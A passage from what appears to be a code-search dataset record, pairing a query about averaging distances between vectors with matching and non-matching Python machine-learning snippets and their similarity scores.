' ' + line + '\\n')", "def write_features(self):\r\n def pack_keypoint(keypoints, descriptors):\r\n kpts = np.array([[kp.pt[0], kp.pt[1], kp.size,\r\n kp.angle, kp.response, kp.octave,\r\n kp.class_id]\r\n for kp in keypoints])\r\n desc = np.array(descriptors)\r\n return kpts, desc\r\n\r\n filename = self.features_path + self.id\r\n kpts, desc = pack_keypoint(self.keypoints, self.descriptors)\r\n logging.info(f'Writing features of image {self.name} to file...')\r\n np.savez(filename, keypoints=kpts, descriptors=desc)\r\n logging.info('Features saved.')", "def write_features(self):\n num_features_per_file = math.ceil(len(self.features) / self.num_jobs)\n for idx in range(self.num_jobs):\n job_features = self.features[idx * num_features_per_file: (idx + 1) * num_features_per_file]\n features_filename = constants.INPUT_FEATURES_FILENAME.format(self.args.output_dir, idx)\n with open(features_filename, \"wb\") as features_file:\n cloudpickle.dump(job_features, features_file, protocol=pickle.DEFAULT_PROTOCOL)", "def predict(model, features):\n result = model.predict(features)\n return result", "def save_vector(dataset, outpath, driver=None):\n try:\n if not driver:\n driver = dataset.GetDriver()\n if os.path.exists(outpath):\n driver.DeleteDataSource(outpath)\n dst_ds = driver.CopyDataSource(dataset, outpath)\n else:\n driver = ogr.GetDriverByName(driver)\n if os.path.exists(outpath):\n driver.DeleteDataSource(outpath)\n dst_ds = driver.CopyDataSource(dataset, outpath)\n\n\n except RuntimeError as err:\n raise err\n except Exception as e:\n raise e\n\n finally:\n dst_ds = None # Flush the dataset to disk", "def save_model(self):\n pickle.dump(self, open(\"Logistic_Regression_Model.pkl\", \"wb\"))", "def save(model, filename):\n print(\"... saving model in {}\".format(filename))\n f = open(filename, \"wb\")\n pickle.dump(model, f)\n f.close()", "def test():\n # load dataset and model\n X, observed_y = load_data('../data/dev.txt')\n\n model = pickle.load(open('test.model', 'rb'))\n model.traverse()\n\n # predict labels for dataset\n preds = model.predict(X)\n\n # print(preds)\n # output model predictions\n np.savetxt('test.predictions', preds, fmt='%s')", "def run(self, dataset_path):\n features = self._generate_features(self._feature_extractors)\n features.to_csv(dataset_path)", "def load_model_and_create_submission_file(model_save_path, csv_path, threshold=0.25):\n model = load_model(model_save_path)\n imgs = datatools.load_test_images('data/test_set_images/')\n predict_imgs = [predict_test_img(img, model) for img in imgs]\n create_csv(predict_imgs, csv_path, threshold)", "def save_features(videos, net, transformer):\n n_features = 4096\n name = 'baseline'\n for video in videos:\n X = np.empty((0, n_features))\n y = np.empty(0)\n print '[INFO] processing video %d / %d' % (videos.index(video) + 1, len(videos))\n for reverse in [False, True]:\n for flip in [False, True]:\n if (is_forward(video) and (not reverse)) or ((not is_forward(video)) and reverse):\n direction = 'f'\n else:\n direction = 'b'\n flows = load_video(video, './data/ArrowDataAll/', mask = lambda x: x[:3] == 'of' + direction, grayscale = True, flip = flip, reverse = reverse)\n sel = np.asarray([[2*i, 2*i+1] for i in select(flows, 1)]).flatten()\n flows = np.take(flows, sel, axis = 0)\n imgs = []\n for i in range(len(flows)/2):\n _, ang = cv2.cartToPolar(np.asarray(flows[0], dtype = np.float32), np.asarray(flows[1], dtype = np.float32))\n image = np.stack([flows[0], flows[1], cv2.normalize(ang,None,0,255,cv2.NORM_MINMAX)], axis = -1)\n imgs.append(image)\n imgs = map(lambda x: transformer.preprocess('data', x), imgs)\n net.blobs['data'].data[...] = imgs\n net.forward()\n X = np.append(X, net.blobs['fc7'].data, axis = 0)\n if direction == 'f':\n y = np.append(y, 1)\n else:\n y = np.append(y, 0)\n with open(os.path.join('./data/ArrowDataAll', video, 'features-' + name + '.csv'), 'w') as f:\n np.savetxt(f, X, delimiter = ',', fmt = '%f')\n with open(os.path.join('./data/ArrowDataAll', video, 'labels-' + name + '.csv'), 'w') as f:\n np.savetxt(f, y, delimiter = ',', fmt = '%d')", "def write_features_to_file(filename,locs,desc):\n savetxt(filename, hstack((locs, desc)))", "def predict(model, dataset_info, args):\n dataset_info, model_info = fill_info_dicts(dataset_info, args)\n\n fill_pred_op_info(dataset_info, model, args, model_info)\n # fill_topic_op(args, model_info)\n\n str_ = 'Predictions of the given text data of dataset %s using different ' \\\n 'saved models:' % args.predict_dataset\n labels = [str(i) for i in dataset_info[args.predict_dataset]['labels']]\n if len(labels) == 2 or args.task == 'regression':\n # TODO currently just hard code for binary\n header = 'id\\tlabel\\t' + str(1) + '\\n'\n else:\n header = 'id\\tlabel\\t' + '\\t'.join(labels) + '\\n'\n\n saver = tf.train.Saver(max_to_keep=100)\n\n model_names = args.datasets\n if len(args.datasets) > 1:\n model_names.append('MULT')\n\n for model_name in model_names:\n # load the saved best model\n str_ += '\\nUsing the model that performs the best on (%s)\\n' % model_name\n\n output = header\n str_ += header\n\n data = []\n\n with tf.Session() as sess:\n if model_name == 'MULT':\n checkpoint_path = os.path.join(args.checkpoint_dir, 'MULT',\n 'model')\n else:\n checkpoint_path = model_info[model_name]['checkpoint_path']\n\n saver.restore(sess, checkpoint_path)\n\n dataset_name = args.predict_dataset\n\n # import pdb\n # sess.run(model_info[dataset_name]['pred_iter'].initializer)\n # batch = model_info[dataset_name]['pred_batch']\n # text, weights = sess.run([batch['text'], batch['text_weights']])\n # pdb.set_trace()\n\n _pred_op = model_info[dataset_name]['pred_pred_op']\n _pred_iter = model_info[dataset_name]['pred_iter']\n _ids, _predictions, _scores = get_all_pred_res(sess, _pred_op,\n _pred_iter, args)\n\n for id, pred, score in zip(_ids, _predictions, _scores):\n record = {\n 'id': id,\n 'label': pred\n }\n if args.task == 'classification':\n for l, s in zip(labels, score):\n record[str(l)] = s\n else:\n record['score'] = score[0]\n data.append(record)\n\n # output positive score for binary classification\n\n if len(score) == 2:\n score = str(score[1])\n else:\n score = '\\t'.join([str(i) for i in score])\n str_ += id + '\\t' + str(int(pred)) + '\\t' + score + '\\n'\n output += id + '\\t' + str(int(pred)) + '\\t' + score + '\\n'\n\n make_dir(args.predict_output_folder)\n\n with open(\n os.path.join(args.predict_output_folder, model_name) + '.tsv',\n 'w') as file:\n # for i in _predictions:\n # file.write(str(i))\n file.write(output)\n\n with open(\n os.path.join(args.predict_output_folder, model_name) + '.json',\n 'wt') as file:\n json.dump(data, file, ensure_ascii=False)\n\n logging.info(str_)", "def postprocess_output(\n self,\n init_net: core.Net,\n predict_net: core.Net,\n workspace: core.workspace,\n output_names: List[str],\n py_model,\n ):\n model_out = py_model(*self.dummy_model_input)\n res = py_model.output_layer.export_to_caffe2(\n workspace, init_net, predict_net, model_out, *output_names\n )\n\n # optionally include the last decoder layer of pytorch model\n final_output_names = [str(output) for output in res] + (\n output_names if self.config.export_logits else []\n )\n\n return res, final_output_names", "def save_model(model, filename):\n with open(filename, 'wb') as f:\n joblib.dump(model, f)", "def dump_model(model,\n dataset=None,\n output_dir='./dump_results',\n dump_float=False,\n weights_only=False,\n **kwargs):\n if model_utils.is_tf_graphdef(model):\n from tensorflow_model_optimization.python.core.quantization.keras.vitis import (\n vitis_quantize_pb)\n return vitis_quantize_pb.PBQuantizer(model).dump_model(output_dir=output_dir,\n dump_float=dump_float, **kwargs)\n\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n if not weights_only and dataset is None:\n logger.error('`dataset` is needed to dump with activation.')\n\n logger.info(\"Start Dumping...\")\n model_utils.dump_model_weights(model, dump_float, output_dir)\n if not weights_only:\n model_utils.dump_model_activations(model, dataset, dump_float, output_dir)", "def predict(self):\n train_vec, test_vec = self.get_tfidf_vectors()\n clf = self.get_classifier()\n\n print '-'*40\n print 'Making predictions ...'\n clf.fit(train_vec, self.train_ans)\n clf_predictions = clf.predict_proba(test_vec)\n\n print 'Storing predictions in', self.pred_file\n pred_out = [\"Id,predictions\"]\n num_pred = range(30)\n for fid, pred in zip(self.test_index, clf_predictions):\n top_rec = sorted(num_pred, key=lambda k: pred[k], reverse=True)[:3]\n pred_out.append(\"%s,%s\" % (fid, ' '.join( [clf.classes_[rec] for rec in top_rec] )))\n with open(self.pred_file, 'w') as f:\n f.write('%s\\n' % ('\\n'.join(pred_out)))", "def dump_processed_data_to_file(self, facts, accu_label, article_label, imprison_label):\r\n data = [facts, accu_label, article_label, imprison_label]\r\n with open(util.MID_DATA_PKL_FILE_LOC, \"wb\") as f:\r\n pickle.dump(data, f)\r\n if util.DEBUG:\r\n print(\"DEBUG: data dumped to `.pkl` file\")", "def write_label_answer(vec, outfile):\n\n if(vec.shape[0] != 70):\n print(\"Error - output vector should have 70 rows.\")\n print(\"Aborting write.\")\n return\n\n for v in vec:\n if((v != -1.0) and (v != 1.0)):\n print(\"Invalid value in input vector.\")\n print(\"Aborting write.\")\n return\n\n np.savetxt(outfile, vec)", "def predict_all(model_file, input_file):\n # Reading a model file\n w = {}\n for line in open(model_file):\n line = line.strip()\n (name, value) = line.split(\"\\t\")\n value = float(value)\n w[name] = value\n\n # Evaluation and print results\n for line in open(input_file):\n line = line.strip()\n phi = create_features(line)\n y_ = predict_one(w, phi)\n\n print y_", "def export_to_caffe2(\n self, model, export_path: str, export_onnx_path: str = None\n ) -> List[str]:\n\n print(f\"Saving caffe2 model to: {export_path}\")\n\n c2_prepared = onnx.pytorch_to_caffe2(\n model,\n self.dummy_model_input,\n self.input_names,\n self.output_names,\n export_path,\n export_onnx_path,\n )\n c2_prepared, final_input_names = self.prepend_operators(\n c2_prepared, self.input_names\n )\n\n # Required because of https://github.com/pytorch/pytorch/pull/6456/files\n with c2_prepared.workspace._ctx:\n predict_net = core.Net(c2_prepared.predict_net)\n init_net = core.Net(c2_prepared.init_net)\n\n net_outputs, final_out_names = self.postprocess_output(\n init_net, predict_net, c2_prepared.workspace, self.output_names, model\n )\n for output in net_outputs:\n predict_net.AddExternalOutput(output)\n c2_prepared.predict_net = predict_net.Proto()\n c2_prepared.init_net = init_net.Proto()\n\n # Save predictor net to file\n onnx.export_nets_to_predictor_file(\n c2_prepared,\n final_input_names,\n final_out_names,\n export_path,\n self.get_extra_params(),\n )\n return final_out_names", "def data_word2vec_one_label(input_file,\n word2vec_model):\n vocab = dict([(k, v.index) for (k, v) in word2vec_model.wv.vocab.items()])\n\n def _token_to_index(content):\n result = []\n for item in content:\n word2id = vocab.get(item)\n if word2id is None:\n word2id = 0\n result.append(word2id)\n return result\n\n\n with open(input_file) as fin:\n raw_tokens_list_gov = []\n raw_tokens_list_art = []\n test_id_list = []\n content_index_list_gov = []\n content_index_list_art = []\n # labels_list = []\n onehot_labels_list = []\n labels_num_list = []\n total_line = 0\n\n for each_line in fin:\n data = json.loads(each_line)\n ds_art = data['testid']\n ds = ds_art.split(\"_\")[0]\n art = ds_art.split(\"_\")[1][1:-1]\n test_id = ds + \"_\" + art\n features_content_gov = data['gov']\n features_content_art = data['art']\n label = data['label']\n\n test_id_list.append(test_id)\n content_index_list_gov.append(_token_to_index(\n features_content_gov))\n content_index_list_art.append(_token_to_index(\n features_content_art))\n\n raw_tokens_list_gov.append(features_content_gov)\n raw_tokens_list_art.append(features_content_art)\n\n # labels_list.append(label)\n # onehot_labels_list.append(_create_onehot_labels(labels_index,\n # num_labels))\n onehot_labels_list.append(label)\n labels_num = 1\n labels_num_list.append(labels_num)\n total_line += 1\n\n\n class _Data:\n def __init__(self):\n pass\n\n @property\n def number(self):\n return total_line\n\n @property\n def testid(self):\n return test_id_list\n\n @property\n def raw_tokens_gov(self):\n return raw_tokens_list_gov\n\n @property\n def raw_tokens_art(self):\n return raw_tokens_list_art\n\n @property\n def tokenindex_gov(self):\n return content_index_list_gov\n\n @property\n def tokenindex_art(self):\n return content_index_list_art\n\n # @property\n # def labels(self):\n # return labels_list\n\n @property\n def onehot_labels(self):\n return onehot_labels_list\n\n @property\n def labels_num(self):\n return labels_num_list\n\n return _Data()", "def export(self, outpath):\n fout = open(outpath, \"w\")\n\n # Header takes the guesswork out of loading by recording how many lines, vector dims\n fout.write(str(self.n_words) + \" \" + str(self.n_dim) + \"\\n\")\n for token in self.id2word:\n vector_components = [\"%.6f\" % number for number in self[token]]\n vector_as_string = \" \".join(vector_components)\n\n out_line = token + \" \" + vector_as_string + \"\\n\"\n fout.write(out_line)\n\n fout.close()", "def save_forward_pass_feature(self):\n import iutils as iu\n import scipy.io as sio\n testdp = self.test_data_provider\n num_batches = len(testdp.batch_range)\n print 'There are ' + str(testdp.get_num_batches(self.data_path)) + ' in directory'\n print 'There are ' + str( num_batches ) + ' in range'\n iu.ensure_dir(self.save_feature_path)\n feature_name = self.op.get_value('save_feature_name')\n feature_dim = self.model_state['layers'][self.feature_idx]['outputs']\n for b in range(num_batches):\n epoch, b_num, data = self.get_next_batch(train=False)\n print ' Start writing batch......\\t' + str(b_num)\n num_data = data[0].shape[-1]\n data += [n.zeros((num_data, feature_dim), dtype=n.single)]\n save_name = 'data_batch_' + str(b_num)\n save_path = iu.fullfile(self.save_feature_path, save_name)\n self.libmodel.startFeatureWriter(data, self.feature_idx)\n self.finish_batch()\n d = testdp.data_dic.copy()\n d['feature'] = data[-1].transpose()\n d['joints8'] = d['joints8'] * testdp.img_size\n del d['data']\n print 'The shape of feature is' + str(d['feature'].shape)\n pickle(save_path, d)\n sio.savemat(save_path, d)", "def __convert_labeled_featuresets(self, labeled_featuresets, output):\n\n\t\tif isinstance(output, str):\n\t\t\toutput = open(output,'w')\n\t\telif not isinstance(output, file):\n\t\t\traise TypeError('output is a str or a file.')\n\n\t\tfor featureset, label in labeled_featuresets:\n\t\t\tfeat, label = self.__text_converter.toSVM(\" \".join(featureset), label)\n\t\t\tfeat = ''.join(' {0}:{1}'.format(f,feat[f]) for f in sorted(feat))\n\t\t\tif label == None:\n\t\t\t\tlabel = -1\n\t\t\toutput.write(str(label) + ' ' + feat + '\\n')\n\t\toutput.close()", "def SaveDecoderAndData(clf, X, X_not_scaled, y, subjID):\n time_to_save = datetime.datetime.now().isoformat()\n time_to_save = time_to_save.replace('T','-')\n time_to_save = time_to_save.replace(':','-')\n \n model = clf\n model_file = 'Models/' + subjID + '_MI_classifier_' + time_to_save[:19] + '.sav'\n pickle.dump(model, open(model_file, 'wb'))\n \n filepath_export_data = 'Models/' + subjID + '_data_for_MI_classifier_' + time_to_save[:19] + '.npz'\n np.savez_compressed(filepath_export_data, subjID=subjID, X=X, X_not_scaled=X_not_scaled, y=y)", "def review_to_vec(words, model, num_features , index2word_set):\n \n feature_vec = np.zeros((num_features), dtype=\"float32\")\n word_count = 0\n \n \n \n for word in words:\n if word in index2word_set: \n word_count += 1\n feature_vec += model[word]\n\n if word_count == 0:\n word_count = 1\n\n feature_vec /= word_count\n\n return feature_vec", "def write_predictions(y_pred, filename, yname=None) :\n out = open(filename, 'wb')\n f = csv.writer(out)\n if yname :\n f.writerow([yname])\n f.writerows(zip(y_pred))\n out.close()", "def file_based_convert_examples_to_features(\n examples, label_list, output_mode, max_seq_length, max_predictions_per_seq, tokenizer, output_file):\n\n writer = tf.python_io.TFRecordWriter(output_file)\n\n for (ex_index, example) in enumerate(examples):\n if ex_index % 10000 == 0:\n tf.logging.info(\"Writing example %d of %d\" % (ex_index, len(examples)))\n\n feature = convert_single_example(ex_index, example, label_list, output_mode,\n max_seq_length, max_predictions_per_seq, tokenizer)\n\n def create_int_feature(values):\n f = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))\n return f\n\n def create_float_feature(values):\n f = tf.train.Feature(float_list=tf.train.FloatList(value=list(values)))\n return f\n\n\n features = collections.OrderedDict()\n features[\"input_ids\"] = create_int_feature(feature.input_ids)\n features[\"input_mask\"] = create_int_feature(feature.input_mask)\n features[\"segment_ids\"] = create_int_feature(feature.segment_ids)\n features[\"masked_lm_positions\"] = create_int_feature(feature.masked_lm_positions)\n features[\"masked_lm_ids\"] = create_int_feature(feature.masked_lm_ids)\n features[\"masked_lm_weights\"] = create_float_feature(feature.masked_lm_weights)\n if output_mode == 'classification':\n features[\"label_ids\"] = create_int_feature([feature.label_id])\n elif output_mode == 'regression':\n features[\"label_ids\"] = create_float_feature([feature.label_id])\n else:\n raise KeyError(mode)\n features[\"is_real_example\"] = create_int_feature(\n [int(feature.is_real_example)])\n\n tf_example = tf.train.Example(features=tf.train.Features(feature=features))\n writer.write(tf_example.SerializeToString())\n writer.close()", "def create_and_save_model(datapath, test_percentage = 0.2):\r\n \r\n pick_in = open(datapath, \"rb\")\r\n data = pickle.load(pick_in)\r\n pick_in.close()\r\n pick_parameter = open('parameters.data', \"rb\")\r\n parameters = pickle.load(pick_parameter)\r\n pick_parameter.close()\r\n #random.shuffle(keys)\r\n #shuffled_data = [(key, data[key]) for key in keys]\r\n \r\n features = []\r\n labels = []\r\n \r\n # sift/surf return dictonary, while hog returns list\r\n # convert both in same format\r\n if type(data) == dict:\r\n farray = []\r\n for label, label_features in data.items():\r\n for feature in label_features:\r\n farray.append([feature, label])\r\n data = farray\r\n \r\n random.shuffle(data)\r\n\r\n for feature, label in data:\r\n features.append(feature)\r\n labels.append(label)\r\n \r\n \r\n \r\n xtrain, xtest, ytrain, ytest = train_test_split(features, labels, test_size=test_percentage)\r\n \r\n # unpack parameters\r\n model = SVC(**parameters)\r\n model.fit(xtrain, ytrain)\r\n \r\n pick = open('model.data', \"wb\") #save model\r\n pickle.dump(model, pick)\r\n pick.close()\r\n\r\n test_data = list(zip(xtest,ytest))\r\n\r\n pick1 = open('data_test.data', \"wb\") #save test data, so that we don't mix up training and test data\r\n pickle.dump(test_data, pick1)\r\n pick1.close()\r\n\r\n print(\"n_test: \", len(xtest))\r\n print(\"n_train: \", len(xtrain))", "def save_word2vec_format(self, fname, doctag_vec=False, word_vec=True, prefix='*dt_', fvocab=None, binary=False):\n total_vec = len(self.wv.vocab) + len(self.docvecs)\n write_first_line = False\n # save word vectors\n if word_vec:\n if not doctag_vec:\n total_vec = len(self.wv.vocab)\n self.wv.save_word2vec_format(fname, fvocab, binary, total_vec)\n # save document vectors\n if doctag_vec:\n if not word_vec:\n total_vec = len(self.docvecs)\n write_first_line = True\n self.docvecs.save_word2vec_format(\n fname, prefix=prefix, fvocab=fvocab, total_vec=total_vec,\n binary=binary, write_first_line=write_first_line)", "def write_metadata(filename, labels):\n with open(filename, 'w') as f:\n f.write(\"Index\\tLabel\\n\")\n for index, label in enumerate(labels):\n f.write(\"{}\\t{}\\n\".format(index, label))\n\n print('Metadata file saved in {}'.format(filename))\n return True\n\n\n \"\"\"\n Helper functions for sampled attack\n and ellipse attack\n \"\"\"\n\n def calc_X_featurized_star(sess, model, y_train, x_train, num_samples_perturb, num_samples_ellipse, display_step = 1):\n A_list = []\n b_list = []\n x_featurized_star = []\n for (idx, x_i) in enumerate(x_train):\n if idx % display_step == 0:\n print(\"Training point number %d\" % idx)\n perturbed_x_i = random_perturbation(x_i, eps = eps_train, num_samples = num_samples_perturb)\n featurized_perturbed_x = model.get_activation(sess, perturbed_x_i)[-2]\n A_i, b_i = learn_constraint_setV2(featurized_perturbed_x)\n A_list.append(A_i)\n b_list.append(b_i)\n x_i_star = solve_inner_opt_problem(sess, model, y_train[idx], num_samples_ellipse, A_i, b_i)\n x_featurized_star.append(x_i_star)\n return np.array(x_featurized_star)", "def dump_model(model, filename):\n import pickle\n logging.info(\"Dumping model into model.pkl\")\n with open(filename, 'w') as dump_file:\n pickle.dump(model, dump_file)", "def _run_labelled_extraction(self, dataset_type: DatasetType, device: str) -> None:\n dataset = self.image_datasets.get_dataset(dataset_type)\n self.extractor_model = self.extractor_model.to(device)\n\n filenames = []\n labels = []\n for i in tqdm(\n range(len(dataset)), desc=\"Extracting features - \" + dataset_type.name\n ):\n image, image_label, filename = dataset.getitem_filename(i)\n # Extract tensor and save\n feature_tensor = self.extractor_model(image.unsqueeze(0).to(device))\n self._save_tensor(dataset_type, feature_tensor, filename)\n filenames.append(filename)\n labels.append(image_label)\n\n # Save labels file\n labels_filepath = self.get_labels_filepath(dataset_type)\n with open(labels_filepath, \"w+\") as file:\n csv_writer = csv.writer(file)\n for filename, label in zip(filenames, labels):\n csv_writer.writerow([filename, label])", "def save_model(model, model_filepath, protocol=0):\n # using pickle to store trained classifier\n #pickle.dump(model,open(model_filepath,'wb'))\n \n file = gzip.GzipFile(model_filepath, 'wb')\n file.write(pickle.dumps(model, protocol))\n file.close()\n \n pass", "def WriteSrnModelToFile(filename, model):\n\n # Write the .hpp file\n WriteHeaderFileForSrnModel(filename, model)\n\n # Write the .cpp fil\n WriteSourceFileForSrnModel(filename, model)", "def get_feature_0(data_points:np.array, save_name = ''):\n def pair_d(M):\n # extract the upper triangle of the pairwise distance matrix\n # upper_tri() in functions.py\n d = [upper_tri(pairwise_distances(M[:,i].reshape(-1,1))) for i in range(M.shape[1])]\n # Unlist the list and convert it to an array \n vec = np.array(list(chain.from_iterable(d))).reshape(-1,1)\n return vec\n \n start = time.time()\n # apply pairwise function to all samples \n d = [pair_d(data_points[i]) for i in range(data_points.shape[0])]\n feature0 = np.array(d).reshape(data_points.shape[0],-1)\n tm = round(time.time()-start,4)\n \n if save_name != '':\n np.savetxt(fname = output_dir + save_name + '.csv', X=feature0, delimiter=',')\n #print(\"-----Feature set 0 shape:\", feature0.shape)\n return(feature0, tm)", "def create_Tf_matrix(\n corpus,\n filename_npz=\"../data/tfidf/data_tf.npz\",\n filename_features=\"../data/tfidf/data_feature_names.pkl\",\n):\n\n vectorizer = CountVectorizer(max_features=len(corpus))\n X = vectorizer.fit_transform(corpus)\n print(\"-Vectorized matrix, \", X.toarray().shape)\n print(\" first line:\")\n print(X.toarray()[0])\n print(\"- Nombre de features :\" + str(len(vectorizer.get_feature_names())))\n print(vectorizer.get_feature_names()[0:10], \" ...\")\n\n data = pd.DataFrame(vectorizer.get_feature_names())\n data.to_pickle(filename_features)\n print(\"tf feature names - saved\")\n sparse.save_npz(filename_npz, X)\n print(\"tf matrix:\", filename_npz, \" - saved\")", "def feature_vecs_DOC(train_pos, train_neg, test_pos, test_neg):\n # Doc2Vec requires LabeledSentence objects as input.\n # Turn the datasets from lists of words to lists of LabeledSentence objects.\n # YOUR CODE HERE\n labeled_train_pos = []\n labeled_train_neg = []\n labeled_test_pos = []\n labeled_test_neg = []\n i = 0\n for line in train_pos:\n labeled_train_pos.append(LabeledSentence(line, ['TRAIN_POS_%i' % i]))\n i += 1\n i = 0\n for line in train_neg:\n labeled_train_neg.append(LabeledSentence(line, ['TRAIN_NEG_%i' % i]))\n i += 1\n i = 0\n for line in test_pos:\n labeled_test_pos.append(LabeledSentence(line, ['TEST_POS_%i' % i]))\n i += 1\n i = 0\n for line in test_neg:\n labeled_test_neg.append(LabeledSentence(line, ['TEST_NEG_%i' % i]))\n i += 1\n\n # Initialize model\n model = Doc2Vec(min_count=1, window=10, size=100, sample=1e-4, negative=5, workers=4)\n sentences = labeled_train_pos + labeled_train_neg + labeled_test_pos + labeled_test_neg\n model.build_vocab(sentences)\n\n # Train the model\n # This may take a bit to run \n for i in range(5):\n print \"Training iteration %d\" % (i)\n random.shuffle(sentences)\n model.train(sentences)\n\n # Use the docvecs function to extract the feature vectors for the training and test data\n # YOUR CODE HERE\n train_pos_vec = []\n train_neg_vec = []\n test_pos_vec = []\n test_neg_vec = []\n for j in range(len(train_pos)):\n train_pos_vec.append(model.docvecs['TRAIN_POS_%i' % j])\n for j in range(len(train_neg)):\n train_neg_vec.append(model.docvecs['TRAIN_NEG_%i' % j])\n for j in range(len(test_pos)):\n test_pos_vec.append(model.docvecs['TEST_POS_%i' % j])\n for j in range(len(test_neg)):\n test_neg_vec.append(model.docvecs['TEST_NEG_%i' % j])\n\n # Return the four feature vectors\n return train_pos_vec, train_neg_vec, test_pos_vec, test_neg_vec", "def save2file(self):\n ids_input = []\n labels_input = []\n ids_path = os.path.join(self.path, 'ids')\n if not os.path.exists(ids_path):\n os.makedirs(ids_path)\n labels_path = os.path.join(self.path, 'labels')\n if not os.path.exists(labels_path):\n os.makedirs(labels_path)\n ids_total = len(self.test)\n for i in range(ids_total):\n ids_input = self.test[i][0]\n labels_input = self.test[i][1]\n file_name = \"ids/\" + str(i) + \".bin\"\n file_path = os.path.join(self.path, file_name)\n np.array(ids_input, dtype=np.int32).tofile(file_path)\n file_name = \"labels/\" + str(i) + \".bin\"\n file_path = os.path.join(self.path, file_name)\n np.array(labels_input, dtype=np.int32).tofile(file_path)\n print(\"\\n ****** Success! ******\\n \")", "def makeFeatureVec(words, model, num_features):\n\t# Initialize an empty numpy array (for speed) \n\tfeatureVec = np.zeros((num_features,), dtype=\"float32\")\n\t# Initialize a counter (number of words)\n\tnwords = 0.\n\t \n\t# Index2word is a list that contains the names of the words in the model's vocabulary. \n\tindex2word_set = set(model.index2word)\n\t# \n\t# Loop over each word in the review and, if it is in the model's vocaublary, add \n\t# its feature vector to the total \n\tfor word in words:\n\t\tif word in index2word_set:\n\t\t\tnwords = nwords + 1.\n\t\t\tfeatureVec = np.add(featureVec,model[word])\n\t# \n\t# Divide the result by the number of words to get the average \n\tfeatureVec = np.divide(featureVec,nwords)\n\treturn featureVec", "def save_features_predictors(X,y):\n pwd = \"./data/\"\n if __name__ == \"__main__\":\n pwd = \".\" + pwd\n else:\n pass\n\n fn1 = os.path.join(pwd, \"features.npy\")\n fn2 = os.path.join(pwd, \"predictors.npy\")\n exists1 = os.path.isfile(fn1)\n exists2 = os.path.isfile(fn2)\n if exists1 and exists2:\n inp = input(\"Would you like to overwrite previous data?(y/n)\")\n if str(inp) == \"y\" or str(inp) == \"Y\":\n np.save(fn1, X)\n np.save(fn2, y)\n print(f\"Features X and outcomes y overwritten in files {fn1}\" +\n f\" and {fn2}.\")\n else:\n print(\"Data not overwritten.\")\n else:\n np.save(fn1, X)\n np.save(fn2, y)\n print(f\"Features X and outcomes y saved in files {fn1} and {fn2}.\")" ]
[ "0.6803554", "0.6240717", "0.6221068", "0.6063516", "0.6009722", "0.5950848", "0.5824239", "0.58020353", "0.57663727", "0.57563233", "0.5755955", "0.57133436", "0.5701105", "0.5675284", "0.56728137", "0.56672686", "0.56518734", "0.56423616", "0.56261265", "0.56195384", "0.56093127", "0.559749", "0.55943036", "0.5589769", "0.55883914", "0.55862075", "0.5547711", "0.5543332", "0.5540957", "0.5536413", "0.55287206", "0.552623", "0.5522566", "0.55219656", "0.5515857", "0.5507746", "0.54650295", "0.5463799", "0.5449943", "0.54439616", "0.5439938", "0.54175425", "0.5387174", "0.5380249", "0.5363178", "0.5362834", "0.53576255", "0.5356762", "0.5350925", "0.5349875", "0.53480417", "0.5347965", "0.53462857", "0.53360176", "0.5335901", "0.5323942", "0.53096104", "0.5284966", "0.5274741", "0.52723", "0.5249406", "0.52482814", "0.5241681", "0.5241554", "0.52331334", "0.52268314", "0.5225022", "0.5222772", "0.5222407", "0.5220686", "0.5213464", "0.52105373", "0.5210335", "0.5206063", "0.520441", "0.51970595", "0.51885325", "0.5184893", "0.5178633", "0.51774395", "0.51754016", "0.5174482", "0.5173046", "0.515685", "0.5154181", "0.51500654", "0.5148897", "0.5147967", "0.5144746", "0.5144185", "0.51431924", "0.5139615", "0.5137513", "0.5134611", "0.5131439", "0.5131305", "0.5130189", "0.513016", "0.5127436", "0.51192015" ]
0.6868015
0
Returns the average distance between pairs of vectors in a given list of vectors.
def average_distance_between_vectors(vectors, distance): vectors = numpy.array(vectors) vectors = vectors - numpy.mean(vectors, axis=0) vectors = normalize(vectors) vectors = list(vectors) average_distance = utils.RunningAverage() for vector_1, vector_2 in itertools.combinations(vectors, r=2): # All pairs of vectors average_distance.update(distance(vector_1, vector_2)) return average_distance()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def average_vectors(vectors_list):\n return np.mean(vectors_list, axis=0)", "def compute_average(vec_list):\r\n return np.sum(vec_list, axis = 0)/len(vec_list)", "def average(cls, vectors):\n return cls.sum(vectors) / len(vectors)", "def vector_mean(vectors: List[Vector]) -> Vector:\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))", "def vector_mean(vectors: List[Vector]) -> Vector:\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))", "def vector_mean(vectors: List[Vector]) -> Vector:\n n = len(vectors)\n\n return scalar_multiply(1/n, vector_sum(vectors))", "def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1 / n, vector_sum(vectors))", "def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1 / n, vector_sum(vectors))", "def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))", "def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))", "def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))", "def getAveragePositionFromList( positionsList ):\n \n vectors = [ vector.makeMVector( values = [x, y, z] ) for x, y, z in positionsList ]\n \n vectorsSum = vector.makeMVector()\n \n for v in vectors:\n \n vectorsSum += v\n \n vectorsAverage = vectorsSum / len( positionsList )\n \n return [ vectorsAverage[0], vectorsAverage[1], vectorsAverage[2] ]", "def _vector_dist(self, vec1, vec2):\r\n return sqrt(sum([(float(v1) - float(v2)) ** 2 for v1, v2 in\r\n zip(vec1, vec2)]))", "def average_distance(c1, c2):\n return sum(sum(symmetric_distances[p1][p2] for p1 in c1) for p2 in c2) \\\n / (len(c1) * len(c2))", "def distance_metric(u, v):\n if len(u) != len(v):\n raise Exception(\n \"Distance metric not valid for differently sized vectors\")\n sum = 0.\n for i in range(len(u)):\n sum += ((u[i] - v[i]) ** 2)\n return math.sqrt(sum)", "def average_distance(predictions, targets):\n total_distance = 0\n for prediction, target in zip(predictions, targets):\n total_distance += Levenshtein.distance(prediction, target)\n return total_distance / len(predictions)", "def mse (vec1, vec2):\n sum = 0.0 #Initializes sum to 0\n count = len(vec1) #Number of total elements in each vector\n for i in range(count):\n sum += (vec2[i]-vec1[i])**2 #Adds the square of the difference between the 